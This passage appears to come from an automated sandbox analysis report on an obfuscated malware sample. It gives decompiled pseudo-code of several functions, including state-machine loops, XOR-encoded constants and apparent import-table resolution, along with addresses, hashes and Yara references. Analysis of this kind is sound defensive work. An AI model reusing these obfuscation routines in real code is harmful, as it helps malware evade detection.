				_v28 = 0xbf97;
				_v28 = _v28 + 0xffff41a2;
				_v28 = _v28 * 0x14;
				_v28 = _v28 ^ 0x00001fe8;
				_v32 = 0x3a57;
				_v32 = _v32 << 3;
				_v32 = _v32 ^ 0x30418ed0;
				_v32 = _v32 ^ 0x30407688;
				_v4 = 0xf5c8;
				_v4 = _v4 / _t116;
				_v4 = _v4 ^ 0x00000add;
				_t117 =  *0x24ca30; // 0x0
				do {
					while(_t129 != 0x15241428) {
						if(_t129 == 0x1aabdcf3) {
							_push(_t117);
							_push(_t117);
							_t119 = 0x2c;
							_t117 = E00238736(_t119);
							 *0x24ca30 = _t117;
							if(_t117 != 0) {
								_t129 = 0x337355f8;
								continue;
							}
						} else {
							if(_t129 != 0x337355f8) {
								goto L8;
							} else {
								_push(_t117);
								_t112 = E002359D5(_t117, _v36, _t117, _v40, _v16);
								_t117 =  *0x24ca30; // 0x0
								_t131 =  &(_t131[5]);
								_t129 = 0x15241428;
								 *((intOrPtr*)(_t117 + 8)) = _t112;
								continue;
							}
						}
						goto L9;
					}
					_push(_t117);
					_t105 = E00231132(_v20, _t117, _v24, _t117, 0, _v28, _v32, _v4, E0023E377);
					_t117 =  *0x24ca30; // 0x0
					_t131 =  &(_t131[9]);
					_t129 = 0x3afebe4c;
					 *((intOrPtr*)(_t117 + 0x18)) = _t105;
					L8:
				} while (_t129 != 0x3afebe4c);
				L9:
				return 0 | _t117 != 0x00000000;
			}

0x00247d03
0x00247d06
0x00247d10
0x00247d18
0x00247d20
0x00247d30
0x00247d35
0x00247d3b
0x00247d40
0x00247d45
0x00247d52
0x00247d5f
0x00247d6c
0x00247d74
0x00247d7c
0x00247d84
0x00247d8c
0x00247d94
0x00247d9c
0x00247da4
0x00247db0
0x00247db5
0x00247dbb
0x00247dc3
0x00247dcb
0x00247dd0
0x00247dd8
0x00247de0
0x00247ded
0x00247dee
0x00247df2
0x00247dfa
0x00247e02
0x00247e0a
0x00247e12
0x00247e1a
0x00247e22
0x00247e2f
0x00247e33
0x00247e3b
0x00247e43
0x00247e48
0x00247e50
0x00247e58
0x00247e66
0x00247e6a
0x00247e72
0x00247e78
0x00247e78
0x00247e82
0x00247eb7
0x00247eb8
0x00247ebb
0x00247ec3
0x00247ec5
0x00247ecd
0x00247ecf
0x00000000
0x00247ecf
0x00247e84
0x00247e86
0x00000000
0x00247e88
0x00247e88
0x00247e96
0x00247e9b
0x00247ea1
0x00247ea4
0x00247ea6
0x00000000
0x00247ea6
0x00247e86
0x00000000
0x00247e82
0x00247ed3
0x00247ef1
0x00247ef6
0x00247efc
0x00247eff
0x00247f01
0x00247f04
0x00247f04
0x00247f0d
0x00247f1a

Strings

\v;8, xrefs: 00247D8C
W:, xrefs: 00247E3B
sV, xrefs: 00247DC3

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: W:$\v;8$sV
API String ID: 0-492820393
Opcode ID: 7f485dfd548d40d57caa53e3dc0af1f2cfa7d50b8ed3ce7bcbb9a74163955e90
Instruction ID: be63e9ef7a2168ff48f048429fd6eb85a429d8fb2f5db673e0252099f683f720
Opcode Fuzzy Hash: 7f485dfd548d40d57caa53e3dc0af1f2cfa7d50b8ed3ce7bcbb9a74163955e90
Instruction Fuzzy Hash: 1C51A9B11193019FD358CF25D88A81FBBE1FB89358F500A1DF4969A2A0D3B5CA59CF87

Uniqueness

Uniqueness Score: -1.00%

Function 0023E05A, Relevance: 3.9, Strings: 3, Instructions: 126
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0023E05A(void* __ecx, void* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed short _v40;
				signed int _v44;
				signed int _v48;
				signed int _t107;
				signed short _t113;
				signed short _t116;
				signed short _t118;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				intOrPtr _t124;
				signed short _t128;
				signed short* _t143;
				signed short _t145;
				void* _t146;
				signed int* _t147;

				_t147 =  &_v48;
				_v16 = 0x6d293b;
				_v12 = 0x468ef5;
				_v8 = 0;
				_v4 = 0;
				_t146 = __ecx;
				_v40 = 0x7b4e;
				_v40 = _v40 + 0xffff3b83;
				_v40 = _v40 + 0xffffa7a8;
				_v40 = _v40 ^ 0xffff5e78;
				_v20 = 0xb6a1;
				_t120 = 0x38;
				_v20 = _v20 / _t120;
				_v20 = _v20 ^ 0x00007f71;
				_v44 = 0x997f;
				_v44 = _v44 ^ 0xba9196e9;
				_v44 = _v44 ^ 0x66374254;
				_t26 =  &_v44; // 0x66374254
				_t121 = 0xe;
				_v44 =  *_t26 / _t121;
				_v44 = _v44 ^ 0x0fc29c0d;
				_v48 = 0x4c26;
				_v48 = _v48 | 0xfd76fef6;
				_v48 = _v48 >> 3;
				_v48 = _v48 ^ 0x1faed217;
				_v24 = 0xc5b2;
				_t122 = 0x42;
				_v24 = _v24 * 0x67;
				_v24 = _v24 << 9;
				_v24 = _v24 ^ 0x9f1566f7;
				_v28 = 0x55d;
				_v28 = _v28 << 0xb;
				_v28 = _v28 / _t122;
				_v28 = _v28 ^ 0x0000f55e;
				_v32 = 0x8f6f;
				_t123 = 6;
				_v32 = _v32 * 0x4f;
				_v32 = _v32 + 0xffffe8fc;
				_v32 = _v32 ^ 0x002c0f4c;
				_v36 = 0xd672;
				_v36 = _v36 / _t123;
				_v36 = _v36 + 0xffffc0a7;
				_v36 = _v36 ^ 0xffffa997;
				_t107 = _v40;
				_t124 =  *((intOrPtr*)(__edx + 0x78 + _t107 * 8));
				if(_t124 == 0 ||  *((intOrPtr*)(__edx + 0x7c + _t107 * 8)) == 0) {
					L13:
					return 1;
				} else {
					_t145 = _t124 + __ecx;
					while(1) {
						_t110 =  *((intOrPtr*)(_t145 + 0xc));
						if( *((intOrPtr*)(_t145 + 0xc)) == 0) {
							goto L13;
						}
						_t128 = E00244AAF(_t110 + _t146, _v20, _v44, _v48);
						_v40 = _t128;
						__eflags = _t128;
						if(_t128 == 0) {
							L15:
							return 0;
						}
						_t143 =  *_t145 + _t146;
						_t118 =  *((intOrPtr*)(_t145 + 0x10)) + _t146;
						while(1) {
							_t113 =  *_t143;
							__eflags = _t113;
							if(__eflags == 0) {
								break;
							}
							if(__eflags >= 0) {
								_t115 = _t113 + 2 + _t146;
								__eflags = _t113 + 2 + _t146;
							} else {
								_t115 = _t113 & 0x0000ffff;
							}
							_t116 = E00236228(_v24, _v28, _v32, _v36, _t128, _t115);
							_t147 =  &(_t147[4]);
							__eflags = _t116;
							if(_t116 == 0) {
								goto L15;
							} else {
								_t128 = _v40;
								_t143 =  &(_t143[2]);
								 *_t118 = _t116;
								_t118 = _t118 + 4;
								__eflags = _t118;
								continue;
							}
						}
						_t145 = _t145 + 0x14;
						__eflags = _t145;
					}
					goto L13;
				}
			}

0x0023e05a
0x0023e05d
0x0023e065
0x0023e075
0x0023e07b
0x0023e07f
0x0023e081
0x0023e089
0x0023e091
0x0023e099
0x0023e0a1
0x0023e0af
0x0023e0b4
0x0023e0ba
0x0023e0c2
0x0023e0ca
0x0023e0d2
0x0023e0da
0x0023e0de
0x0023e0e3
0x0023e0e9
0x0023e0f1
0x0023e0f9
0x0023e101
0x0023e106
0x0023e10e
0x0023e11b
0x0023e11e
0x0023e122
0x0023e127
0x0023e12f
0x0023e137
0x0023e144
0x0023e148
0x0023e150
0x0023e15d
0x0023e15e
0x0023e162
0x0023e16a
0x0023e172
0x0023e180
0x0023e184
0x0023e18c
0x0023e194
0x0023e198
0x0023e19e
0x0023e21c
0x00000000
0x0023e1a6
0x0023e1a6
0x0023e215
0x0023e215
0x0023e21a
0x00000000
0x00000000
0x0023e1c1
0x0023e1c3
0x0023e1c7
0x0023e1c9
0x0023e227
0x00000000
0x0023e227
0x0023e1d0
0x0023e1d2
0x0023e20c
0x0023e20c
0x0023e20e
0x0023e210
0x00000000
0x00000000
0x0023e1d6
0x0023e1e0
0x0023e1e0
0x0023e1d8
0x0023e1d8
0x0023e1d8
0x0023e1f4
0x0023e1f9
0x0023e1fc
0x0023e1fe
0x00000000
0x0023e200
0x0023e200
0x0023e204
0x0023e207
0x0023e209
0x0023e209
0x00000000
0x0023e209
0x0023e1fe
0x0023e212
0x0023e212
0x0023e212
0x00000000
0x0023e215

Strings

TB7f, xrefs: 0023E0DA
;)m, xrefs: 0023E05D
&L, xrefs: 0023E0F1

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: &L$;)m$TB7f
API String ID: 0-1597752287
Opcode ID: ccec81fc12bb8d59d6cf69cf5184f25956325339f73310d4cae82d3e58d50a0d
Instruction ID: fa31acec404a8216b554892dab6a4be05f361feabb4f6c10052834ab44828899
Opcode Fuzzy Hash: ccec81fc12bb8d59d6cf69cf5184f25956325339f73310d4cae82d3e58d50a0d
Instruction Fuzzy Hash: 3351A9B16183028FD718CF25C88592BBBE1FFD4358F104A1DF899962A0D774DA5ACF86

Uniqueness

Uniqueness Score: -1.00%

Function 002461B8, Relevance: 3.8, Strings: 3, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E002461B8(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t64;
				void* _t68;
				void* _t69;
				signed int _t71;
				void* _t75;
				void* _t76;
				signed int* _t78;

				_t78 =  &_v24;
				_v12 = 0x5dfc;
				_v12 = _v12 * 0x23;
				_t69 = __ecx;
				_v12 = _v12 << 7;
				_t75 = 0;
				_v12 = _v12 ^ 0x066cb215;
				_t76 = 0x1b4ca438;
				_v24 = 0xd6f7;
				_v24 = _v24 + 0xffffb773;
				_v24 = _v24 + 0xd9f1;
				_v24 = _v24 + 0xe528;
				_v24 = _v24 ^ 0x000200e6;
				_v16 = 0x64b4;
				_v16 = _v16 + 0xda3f;
				_v16 = _v16 >> 1;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 ^ 0x0000725d;
				_v4 = 0xc8c2;
				_v4 = _v4 | 0x9945d150;
				_v4 = _v4 + 0x9caf;
				_v4 = _v4 ^ 0x99461e9f;
				_v20 = 0xe019;
				_t71 = 0x46;
				_v20 = _v20 / _t71;
				_v20 = _v20 >> 0xd;
				_v20 = _v20 >> 4;
				_v20 = _v20 ^ 0x00001f6d;
				_v8 = 0xf95b;
				_v8 = _v8 | 0x30645c78;
				_v8 = _v8 + 0xffff8663;
				_v8 = _v8 ^ 0x3064d0a8;
				do {
					while(_t76 != 0x108726d) {
						if(_t76 == 0x1b4ca438) {
							_t76 = 0x2a486598;
							continue;
						} else {
							if(_t76 == 0x2a486598) {
								_push(_t71);
								_t68 = E00247F1B();
								_t78 =  &(_t78[1]);
								_t76 = 0x108726d;
								_t75 = _t75 + _t68;
								continue;
							}
						}
						goto L7;
					}
					_t71 = _v16;
					_t64 = E0023D64E(_t71, _v4, _v20, _t69 + 4, _v8);
					_t78 =  &(_t78[3]);
					_t76 = 0xee7d46d;
					_t75 = _t75 + _t64;
					L7:
				} while (_t76 != 0xee7d46d);
				return _t75;
			}

0x002461b8
0x002461bb
0x002461ce
0x002461d2
0x002461d4
0x002461d9
0x002461db
0x002461e3
0x002461e8
0x002461f5
0x002461fd
0x00246205
0x0024620d
0x00246215
0x0024621d
0x00246225
0x00246229
0x0024622e
0x00246236
0x0024623e
0x00246246
0x0024624e
0x00246256
0x00246264
0x00246267
0x0024626b
0x00246270
0x00246275
0x0024627d
0x00246285
0x0024628d
0x00246295
0x0024629d
0x0024629d
0x002462ab
0x002462cb
0x00000000
0x002462ad
0x002462af
0x002462b9
0x002462ba
0x002462bf
0x002462c2
0x002462c7
0x00000000
0x002462c7
0x002462af
0x00000000
0x002462ab
0x002462df
0x002462e3
0x002462e8
0x002462eb
0x002462f0
0x002462f2
0x002462f2
0x00246303

Strings

(, xrefs: 00246205
]r, xrefs: 0024622E
x\d0, xrefs: 00246285

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: ($]r$x\d0
API String ID: 0-3053701899
Opcode ID: 51c1d68f1b448b9cd01a0670611b7d4582907cb0fec310406faa2fe7817289f3
Instruction ID: 1f8fcba8fd69887f545519e7eeafc9dda70281feda856bf47d7bce851a08123e
Opcode Fuzzy Hash: 51c1d68f1b448b9cd01a0670611b7d4582907cb0fec310406faa2fe7817289f3
Instruction Fuzzy Hash: FF3166B29083429FD348DE14D84941BBBE0BBD5718F004E5DF899A6265D3B9DE1C8B93

Uniqueness

Uniqueness Score: -1.00%

Function 00240B68, Relevance: 3.8, Strings: 3, Instructions: 75
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E00240B68(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* _t76;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0023602B(_t76);
				_v16 = 0x6860;
				_v16 = _v16 * 0x5b;
				_v16 = _v16 ^ 0xdc6b4abd;
				_v16 = _v16 ^ 0xdc4e778c;
				_v32 = 0xa230;
				_v32 = _v32 << 0xe;
				_v32 = _v32 ^ 0x288c6565;
				_v8 = 0xfe44;
				_v8 = _v8 | 0x4c3583fb;
				_v8 = _v8 + 0xfffff685;
				_v8 = _v8 ^ 0x61a5c761;
				_v8 = _v8 ^ 0x2d906c10;
				_v40 = 0xe5db;
				_v40 = _v40 | 0x9b65f6ba;
				_v40 = _v40 ^ 0x9b65d356;
				_v20 = 0x9adf;
				_v20 = _v20 + 0x49d9;
				_v20 = _v20 + 0xffff68ea;
				_v20 = _v20 ^ 0x00005968;
				_v36 = 0x94a7;
				_v36 = _v36 ^ 0xf3da6fb3;
				_v36 = _v36 ^ 0xf3dae7d2;
				_v28 = 0xd25a;
				_v28 = _v28 + 0x1e41;
				_v28 = _v28 | 0x2f85fa9d;
				_v28 = _v28 ^ 0x2f85d3ee;
				_v12 = 0x5326;
				_v12 = _v12 ^ 0x0ede0c0e;
				_v12 = _v12 >> 7;
				_v12 = _v12 << 4;
				_v12 = _v12 ^ 0x01db8a0a;
				_v24 = 0x6b2;
				_v24 = _v24 << 4;
				_v24 = _v24 | 0x9aa17d8a;
				_t63 =  &_v24;
				_v24 = _v24 ^ 0x9aa13f42;
				_push(_v32);
				_t91 = E0024889D(0x24c0b0, _v16,  *_t63);
				E0023C680(__ecx, _v40, _v20, 0x24c0b0, _v36, _a12, _t79, _a4);
				return E00242025(_v28, _t91, _v12, _v24);
			}

0x00240b70
0x00240b75
0x00240b78
0x00240b7b
0x00240b7c
0x00240b7d
0x00240b82
0x00240b92
0x00240b95
0x00240b9c
0x00240ba3
0x00240baa
0x00240bae
0x00240bb5
0x00240bbc
0x00240bc3
0x00240bca
0x00240bd1
0x00240bd8
0x00240bdf
0x00240be6
0x00240bed
0x00240bf4
0x00240bfb
0x00240c02
0x00240c09
0x00240c10
0x00240c17
0x00240c1e
0x00240c25
0x00240c2c
0x00240c33
0x00240c3a
0x00240c41
0x00240c48
0x00240c4c
0x00240c50
0x00240c57
0x00240c5e
0x00240c62
0x00240c69
0x00240c69
0x00240c70
0x00240c7e
0x00240c96
0x00240cb3

Strings

&S, xrefs: 00240C3A
`h, xrefs: 00240B82
hY, xrefs: 00240C02

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: &S$`h$hY
API String ID: 0-860638928
Opcode ID: 745587b5455777c92b728403b0134296abb58848fb99311a233a1f2b9a5f3ad8
Instruction ID: 5ac32dac8230f610ca4569d4ea37be3fff7344e570bf05e8cdbe1767aafc7ffa
Opcode Fuzzy Hash: 745587b5455777c92b728403b0134296abb58848fb99311a233a1f2b9a5f3ad8
Instruction Fuzzy Hash: A3312FB1C00209EBDF49CFA1C94A8EEBFB5FF44314F208198E41276260D3B94A65CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 10007F07, Relevance: 3.0, APIs: 2, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10007F07(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}

0x10007f0c
0x10007f1c

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 10007F0C
UnhandledExceptionFilter.KERNEL32(?), ref: 10007F15

Memory Dump Source

Source File: 00000007.00000002.2115780820.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2115770180.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115805909.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115830382.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2115840908.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f7c80f92ea83676b0d4ae0fb41d7acd9273c55ff761cf0af19de4335131d4f5f
Instruction ID: 7be572de92686af6165e4848987e7b2d669c1521723c7f37aea2a3297de6ad46
Opcode Fuzzy Hash: f7c80f92ea83676b0d4ae0fb41d7acd9273c55ff761cf0af19de4335131d4f5f
Instruction Fuzzy Hash: BAB09231044218BBEA003B91DC49BCC3F29EB056A2F004012F60D44064CF6256508AA1

Uniqueness

Uniqueness Score: -1.00%

Function 00245A61, Relevance: 2.7, Strings: 2, Instructions: 155
COMMONCrypto

Download Yara Rule

C-Code - Quality: 68%

			E00245A61(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				void* __ecx;
				void* _t115;
				signed int _t129;
				void* _t136;
				void* _t156;
				signed int _t157;
				signed int _t158;
				signed int _t159;
				signed int* _t163;

				_push(_a16);
				_t156 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0023602B(_t115);
				_v564 = 0x4767;
				_t163 =  &(( &_v600)[6]);
				_v564 = _v564 << 9;
				_v564 = _v564 ^ 0x008e895f;
				_t136 = 0x30c826c8;
				_v588 = 0x30cc;
				_v588 = _v588 + 0x4702;
				_t157 = 0x63;
				_v588 = _v588 / _t157;
				_v588 = _v588 + 0xb80e;
				_v588 = _v588 ^ 0x0000cf36;
				_v596 = 0xadf;
				_t158 = 0x66;
				_v596 = _v596 * 0x61;
				_v596 = _v596 / _t158;
				_t159 = 0x4c;
				_v596 = _v596 / _t159;
				_v596 = _v596 ^ 0x0000541c;
				_v592 = 0x64b0;
				_v592 = _v592 * 0x15;
				_v592 = _v592 + 0xa35f;
				_v592 = _v592 >> 0xe;
				_v592 = _v592 ^ 0x0000251e;
				_v600 = 0x3c82;
				_v600 = _v600 | 0xdba50be5;
				_v600 = _v600 ^ 0x0661176e;
				_v600 = _v600 + 0x2491;
				_v600 = _v600 ^ 0xddc40dba;
				_v572 = 0x6631;
				_v572 = _v572 + 0xffff287e;
				_v572 = _v572 + 0x2e34;
				_v572 = _v572 ^ 0xffff8a80;
				_v584 = 0x3cf9;
				_v584 = _v584 ^ 0x209cd78c;
				_v584 = _v584 ^ 0x88ea975c;
				_v584 = _v584 | 0x088f8ebb;
				_v584 = _v584 ^ 0xa8ffe4fe;
				_v560 = 0x5a99;
				_v560 = _v560 << 2;
				_v560 = _v560 ^ 0x0001627e;
				_v576 = 0xc549;
				_v576 = _v576 * 0x36;
				_v576 = _v576 + 0xffff72cb;
				_v576 = _v576 ^ 0x00296382;
				_v568 = 0xc477;
				_v568 = _v568 + 0xffff852d;
				_v568 = _v568 ^ 0x00000bf7;
				_t160 = _v568;
				_v580 = 0xe5ab;
				_v580 = _v580 + 0x26f9;
				_v580 = _v580 + 0xffffb6c9;
				_v580 = _v580 ^ 0x0000c36f;
				do {
					while(_t136 != 0x96b3cdc) {
						if(_t136 == 0xc60f3b0) {
							_t129 = E00249AC7(_v572, _v584,  &_v556, _v560, _t160);
							_t163 =  &(_t163[3]);
							L11:
							asm("sbb ecx, ecx");
							_t136 = ( ~_t129 & 0xe09a757b) + 0x28d0c761;
							continue;
						}
						if(_t136 == 0x1f7f9ad4) {
							_v556 = 0x22c;
							_t129 = E002376F7( &_v556, _v592, _v600, _t160);
							goto L11;
						}
						if(_t136 == 0x28d0c761) {
							return E00244F7D(_v576, _v568, _t160);
						}
						if(_t136 != 0x2dc3f3d6) {
							if(_t136 != 0x30c826c8) {
								goto L16;
							} else {
								_t136 = 0x2dc3f3d6;
								continue;
							}
							L19:
							return _t129;
						}
						_t129 = E00231C88(_t136, _t136, _v580);
						_t160 = _t129;
						_t163 =  &(_t163[3]);
						if(_t129 != 0xffffffff) {
							_t136 = 0x1f7f9ad4;
							continue;
						}
						goto L19;
					}
					_push(_t156);
					_push( &_v556);
					if(_a4() == 0) {
						_t136 = 0x28d0c761;
						goto L16;
					} else {
						_t136 = 0xc60f3b0;
						continue;
					}
					goto L19;
					L16:
				} while (_t136 != 0x22b9bf83);
				return _t129;
			}

0x00245a6b
0x00245a72
0x00245a74
0x00245a7b
0x00245a82
0x00245a89
0x00245a8b
0x00245a90
0x00245a98
0x00245a9b
0x00245aa2
0x00245aaa
0x00245aaf
0x00245abc
0x00245acf
0x00245ad4
0x00245ada
0x00245ae2
0x00245aea
0x00245af7
0x00245afa
0x00245b06
0x00245b0e
0x00245b11
0x00245b15
0x00245b1d
0x00245b2a
0x00245b2e
0x00245b36
0x00245b3b
0x00245b43
0x00245b4b
0x00245b53
0x00245b5b
0x00245b63
0x00245b6b
0x00245b73
0x00245b7b
0x00245b83
0x00245b8b
0x00245b93
0x00245b9b
0x00245ba3
0x00245bab
0x00245bb3
0x00245bbb
0x00245bc0
0x00245bc8
0x00245bd5
0x00245bd9
0x00245be1
0x00245be9
0x00245bf1
0x00245bf9
0x00245c01
0x00245c05
0x00245c0d
0x00245c15
0x00245c1d
0x00245c25
0x00245c25
0x00245c33
0x00245cd1
0x00245cd6
0x00245cac
0x00245cb0
0x00245cb8
0x00000000
0x00245cb8
0x00245c3f
0x00245c9d
0x00245ca5
0x00000000
0x00245cab
0x00245c43
0x00000000
0x00245d11
0x00245c4f
0x00245c57
0x00000000
0x00245c5d
0x00245c5d
0x00000000
0x00245c5d
0x00245d1c
0x00245d1c
0x00245d1c
0x00245c76
0x00245c7b
0x00245c7d
0x00245c83
0x00245c89
0x00000000
0x00245c89
0x00000000
0x00245c83
0x00245cdb
0x00245ce0
0x00245cea
0x00245cf3
0x00000000
0x00245cec
0x00245cec
0x00000000
0x00245cec
0x00000000
0x00245cf5
0x00245cf5
0x00000000

Strings

4., xrefs: 00245B7B
gG, xrefs: 00245A90

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle
String ID: 4.$gG
API String ID: 2962429428-791606841
Opcode ID: c2f05fb42b6ff04c4c7a9286f8ef30f30c4201f765be1d6751a13ce882cf6e31
Instruction ID: 2567a7ca370f60bf7d3cf6f8f31f70096e5dd35a82fc2131f573d0a2262356e1
Opcode Fuzzy Hash: c2f05fb42b6ff04c4c7a9286f8ef30f30c4201f765be1d6751a13ce882cf6e31
Instruction Fuzzy Hash: FB61AA715287429BD768CF24C88981FBBE0FFC4718F100A1DF5C6962A1D7B98A59CB87

Uniqueness

Uniqueness Score: -1.00%

Function 0023B112, Relevance: 2.6, Strings: 2, Instructions: 111
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0023B112() {
				char _v520;
				signed int _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				char* _t91;
				void* _t94;
				intOrPtr _t97;
				signed int _t109;
				signed int _t110;
				short* _t113;

				_v524 = _v524 & 0x00000000;
				_v536 = 0x15a9e0;
				_t94 = 0x2447ce85;
				_v532 = 0xcaf76;
				_v528 = 0x42cbc4;
				_v544 = 0x1d8c;
				_v544 = _v544 << 8;
				_v544 = _v544 ^ 0x001dbb75;
				_v564 = 0xb98d;
				_v564 = _v564 * 0x6d;
				_v564 = _v564 | 0xb6682b1a;
				_t109 = 0x16;
				_v564 = _v564 / _t109;
				_v564 = _v564 ^ 0x084aef85;
				_v568 = 0xa53e;
				_v568 = _v568 | 0x3e6d869d;
				_t110 = 0x46;
				_v568 = _v568 * 0x2b;
				_v568 = _v568 ^ 0x7c6b3e02;
				_v540 = 0x49b5;
				_v540 = _v540 + 0xbc03;
				_v540 = _v540 ^ 0x0001452b;
				_v556 = 0x9474;
				_v556 = _v556 << 0xb;
				_v556 = _v556 ^ 0xd8ad9d33;
				_v556 = _v556 ^ 0xdc0e2a5f;
				_v560 = 0x11f0;
				_v560 = _v560 + 0xffffe240;
				_v560 = _v560 + 0xb761;
				_v560 = _v560 ^ 0x000087cb;
				_v548 = 0x2457;
				_v548 = _v548 / _t110;
				_v548 = _v548 ^ 0x000075df;
				do {
					while(_t94 != 0x14e9f4e4) {
						if(_t94 == 0x21e9d2a8) {
							_t97 =  *0x24ca2c; // 0x5d8300
							_t82 = _t97 + 0x230; // 0x7a0056
							return E00236636(_t82, _v556, _v560, _v548, _t113);
						}
						if(_t94 == 0x2275b3e1) {
							_t91 = E00243E3F(_t94,  &_v520, __eflags, _v544, _v564);
							_t94 = 0x14e9f4e4;
							continue;
						}
						if(_t94 != 0x2447ce85) {
							goto L15;
						}
						_t94 = 0x2275b3e1;
					}
					_v552 = 0xe342;
					_v552 = _v552 ^ 0x7b193e87;
					_v552 = _v552 ^ 0x7b19ddc7;
					_t113 =  &_v520 + E00240ADC( &_v520, _v568, _v540) * 2;
					while(1) {
						_t91 =  &_v520;
						__eflags = _t113 - _t91;
						if(_t113 <= _t91) {
							break;
						}
						__eflags =  *_t113 - 0x5c;
						if( *_t113 != 0x5c) {
							L10:
							_t113 = _t113 - 2;
							__eflags = _t113;
							continue;
						}
						_t76 =  &_v552;
						 *_t76 = _v552 - 1;
						__eflags =  *_t76;
						if( *_t76 == 0) {
							__eflags = _t113;
							L14:
							_t94 = 0x21e9d2a8;
							goto L15;
						}
						goto L10;
					}
					goto L14;
					L15:
					__eflags = _t94 - 0x318d27d3;
				} while (__eflags != 0);
				return _t91;
			}

0x0023b118
0x0023b11f
0x0023b127
0x0023b12c
0x0023b134
0x0023b13c
0x0023b144
0x0023b149
0x0023b151
0x0023b162
0x0023b16b
0x0023b183
0x0023b188
0x0023b18e
0x0023b196
0x0023b19e
0x0023b1b3
0x0023b1b4
0x0023b1b8
0x0023b1c0
0x0023b1c8
0x0023b1d0
0x0023b1d8
0x0023b1e0
0x0023b1e5
0x0023b1ed
0x0023b1f5
0x0023b1fd
0x0023b205
0x0023b20d
0x0023b215
0x0023b223
0x0023b227
0x0023b233
0x0023b233
0x0023b239
0x0023b2ce
0x0023b2d8
0x00000000
0x0023b2e3
0x0023b241
0x0023b25b
0x0023b262
0x00000000
0x0023b262
0x0023b249
0x00000000
0x00000000
0x0023b24b
0x0023b24b
0x0023b266
0x0023b272
0x0023b27a
0x0023b294
0x0023b2a8
0x0023b2a8
0x0023b2ac
0x0023b2ae
0x00000000
0x00000000
0x0023b299
0x0023b29d
0x0023b2a5
0x0023b2a5
0x0023b2a5
0x00000000
0x0023b2a5
0x0023b29f
0x0023b29f
0x0023b29f
0x0023b2a3
0x0023b2b2
0x0023b2b5
0x0023b2b5
0x00000000
0x0023b2b5
0x00000000
0x0023b2a3
0x00000000
0x0023b2b7
0x0023b2b7
0x0023b2b7
0x00000000

Strings

W$, xrefs: 0023B215
B, xrefs: 0023B266

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: B$W$
API String ID: 0-584637061
Opcode ID: 44b181504879ea0d1ed24928566f6a986cfd210e4bee9c1ecd534ccc22b94645
